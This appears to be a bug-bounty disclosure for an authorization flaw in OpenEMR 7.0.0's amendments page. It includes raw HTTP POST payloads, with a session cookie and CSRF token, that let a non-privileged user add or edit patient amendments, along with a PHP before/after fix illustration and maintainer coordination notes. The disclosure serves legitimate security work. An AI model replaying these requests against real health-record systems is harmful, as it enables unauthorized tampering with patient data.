Unauthorized to create and edit Amendments function in openemr/openemr

Valid

Reported on

Jul 21st 2022


Description

We would like to report the vulnerability we found during software testing. OpenEMR 7.0.0 (the latest version), the open-source electronic health records and medical practice management application, allows unauthorized create and edit on “Patient/dashboard/Amendments” through the “add_edit_amendments.php” function, and it has never been reported before (we checked the official CVE website).

Vulnerability Type

Improper privilege management

Affected Page/URL

https://<openemrurl>/interface/patient_file/summary/add_edit_amendments.php

Sample Payload

ADD

POST /interface/patient_file/summary/add_edit_amendments.php HTTP/1.1

csrf_token_form=…&amendment_date=…&form_amendment_by=patient&desc=Change_from_Acc_Pentest6&form_amendment_status=approved&note=Account_Pentest6&mode=&amendment_id=

EDIT

POST /interface/patient_file/summary/add_edit_amendments.php HTTP/1.1

csrf_token_form=…&amendment_date=…&form_amendment_by=patient&desc=Change_from_Acc_Pentest6&form_amendment_status=approved&note=Account_Pentest6&mode=&amendment_id=590

Vulnerable Source Code

/var/www/localhost/htdocs/interface/patient_file/summary/add_edit_amendments.php (Please see more details in the occurrences section)

Implication

This vulnerability allows a perpetrator to create and edit amendments without authorization. It could adversely affect the integrity, confidentiality, and reliability of the system and its information.

Recommendation

We recommend implementing proper authorization checks on the user before the task is executed; the check should verify that the user holds the permission required to perform the task. In addition, the application should alert the system administrator when such malicious activity is detected.
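The control the recommendation describes, as an added illustration for this report (it is not OpenEMR's add_edit_amendments.php and not the maintainer's fix): the handler shape the PoC exploits, where only the CSRF token is verified before the write, next to a version that also enforces an ACL check and records the denied attempt. AclMain::aclCheckCore(), CsrfUtils::verifyCsrfToken()/csrfNotVerified(), EventAuditLogger::newEvent(), sqlInsert()/sqlStatement() and xlt() are used as the author understands the OpenEMR helpers; the ACL section/subsection 'patients'/'med', the lib_amendments column names and the writeAmendment() helper are assumptions for the example.

```php
<?php
// Added illustration for this report; not OpenEMR's add_edit_amendments.php
// and not the fix commit. Contrasts the handler shape the report describes
// (CSRF token verified, then the write happens for any logged-in user) with
// a version that also enforces an ACL check and logs the denied attempt.
//
// Assumptions: AclMain::aclCheckCore(), CsrfUtils::verifyCsrfToken() /
// csrfNotVerified(), EventAuditLogger::newEvent(), sqlInsert()/sqlStatement()
// and xlt() are used as the author understands the OpenEMR helpers; the ACL
// pair 'patients'/'med', the lib_amendments column names and writeAmendment()
// are assumed for the example.

require_once __DIR__ . '/../../globals.php';

use OpenEMR\Common\Acl\AclMain;
use OpenEMR\Common\Csrf\CsrfUtils;
use OpenEMR\Common\Logging\EventAuditLogger;

/** Insert or update the amendment row (assumed helper, assumed columns). */
function writeAmendment(array $post, int $pid, string $user): int
{
    $id = (int) ($post['amendment_id'] ?? 0);
    if ($id > 0) {
        // Edit path of the PoC: amendment_id=590 / 591 in the report
        sqlStatement(
            "UPDATE lib_amendments SET amendment_date = ?, amendment_by = ?, "
            . "amendment_status = ?, amendment_desc = ?, modified_by = ?, "
            . "modified_time = NOW() WHERE amendment_id = ? AND pid = ?",
            [$post['amendment_date'], $post['form_amendment_by'],
             $post['form_amendment_status'], $post['desc'], $user, $id, $pid]
        );
        return $id;
    }
    // Add path of the PoC: amendment_id left empty
    return (int) sqlInsert(
        "INSERT INTO lib_amendments (amendment_date, amendment_by, amendment_status, "
        . "amendment_desc, pid, created_by, created_time) VALUES (?, ?, ?, ?, ?, ?, NOW())",
        [$post['amendment_date'], $post['form_amendment_by'],
         $post['form_amendment_status'], $post['desc'], $pid, $user]
    );
}

// BEFORE: the shape the report exploits. The CSRF check only stops cross-site
// forgery; any authenticated session such as "Pentest6" passes it, because
// CSRF protection is not authorization.
function saveAmendmentUnchecked(array $post, int $pid): int
{
    if (!CsrfUtils::verifyCsrfToken($post['csrf_token_form'] ?? '')) {
        CsrfUtils::csrfNotVerified();
    }
    return writeAmendment($post, $pid, $_SESSION['authUser']);
}

// AFTER: deny before any write unless the user's ACL grants it, and alert.
function saveAmendmentChecked(array $post, int $pid): int
{
    if (!CsrfUtils::verifyCsrfToken($post['csrf_token_form'] ?? '')) {
        CsrfUtils::csrfNotVerified();
    }
    // Assumed mapping: amendments belong to the patient's medical record, so
    // require write access there. The check runs on every POST server-side;
    // hiding the Dashboard menu in the UI (as for "Pentest6") is not enough.
    if (!AclMain::aclCheckCore('patients', 'med', '', 'write')) {
        EventAuditLogger::instance()->newEvent(
            'security',                              // event category
            $_SESSION['authUser'] ?? 'unknown',      // who attempted it
            $_SESSION['authProvider'] ?? 'unknown',
            0,                                       // success = 0: denied
            "ACL denied amendment write, pid=$pid, amendment_id="
                . ($post['amendment_id'] ?? '')
        );
        http_response_code(403);
        echo xlt('Not authorized to add or edit amendments');
        exit;
    }
    return writeAmendment($post, $pid, $_SESSION['authUser']);
}

// Entry point as the page would reach it (assumed: $_SESSION['pid'] is set
// when a patient chart is opened).
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    saveAmendmentChecked($_POST, (int) $_SESSION['pid']);
}
```

The point of the contrast is where the check sits: on the POST handler itself, not only on the page that renders the form or on the menu entry. With the checked version, replaying the admin's add or edit payload from the "Pentest6" session should return 403 and leave an audit row instead of a new or modified amendment, which is exactly the differential test the PoC screenshots perform.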

Discoverer/Reporters

  • Ammarit Thongthua, Rattapon Jitprajong and Nattakit Intarasorn from Secure D Center Research Team

Example PoC Screenshots

OpenEMR Version 7.0.0

1.png

Log in with admin privilege, which can access the Dashboard menu

2.png 3.png

Create Amendments with admin privilege

4.png

Log in as the non-privileged user “Pentest6”, which cannot access the Dashboard menu

5.png

Replay the admin's add-Amendments payload as the non-privileged user “Pentest6”

6.png

Amendment successfully added without authorization

7.png

Check that the Amendment was added by the non-privileged user “Pentest6”

8.png

Edit Amendments as the non-privileged user “Pentest6”

9.png

Amendment successfully edited without authorization

10.png

Check that the Amendment was edited by the non-privileged user “Pentest6”

11.png

Add/Edit payload

POST /interface/patient_file/summary/add_edit_amendments.php HTTP/1.1
Host: localhost
Cookie: OpenEMR=nNgu3SLWSszYihXtJimCwcxANGWirBrgThxiT22kK1UkbkNO
Content-Length: 214
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: https://localhost/interface/patient_file/summary/add_edit_amendments.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

csrf_token_form=373f96454dd2af0b6a713b223e69ce9b16f09491&amendment_date=2022-07-22&form_amendment_by=patient&desc=Change_from_Acc_Pentest6&form_amendment_status=approved&note=Account_Pentest6&mode=&amendment_id=591


We are processing your report and will contact the openemr team within 24 hours. a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
Brady Miller validated this vulnerability a year ago

Thanks for the report. We are working on a fix.

rata99 has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the openemr team. We will try again in 7 days. a year ago
Brady Miller
a year ago

Maintainer


A preliminary fix has been posted in commit 2973592bc7b1f4996738a6fd27d1e277e33676b6

Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 3-7 weeks. After I do that, it will be OK to make a CVE # and make it public.

Thanks!

rata99
a year ago

Researcher


Hi Brady, Thank you so much.

We have sent a second fix follow up to the openemr team. We will try again in 10 days. a year ago
rata99
a year ago

Researcher


Dear @Brady Miller, @admin Hope you are doing well. We have got the notification email that the 1st patch for OpenEMR 7.0.0 has been released. Can the CVE be assigned to this issue?

Screen-Shot-2022-08-08-at-9-48-42-AM.png

Jamie Slome
a year ago

Admin


Just waiting for the go-ahead from the maintainer and then we can assign and publish a CVE for this report 👍

Brady Miller marked this as fixed in 7.0.0.1 with commit 297359 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Brady Miller
a year ago

Maintainer


OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.

rata99
a year ago

Researcher


Hi @Jamie Slome @Admin could you please help to assign CVE to this issue? Thank you :)

Jamie Slome
a year ago

Admin


Sorted 👍 CVE will be published in a few hours from now!
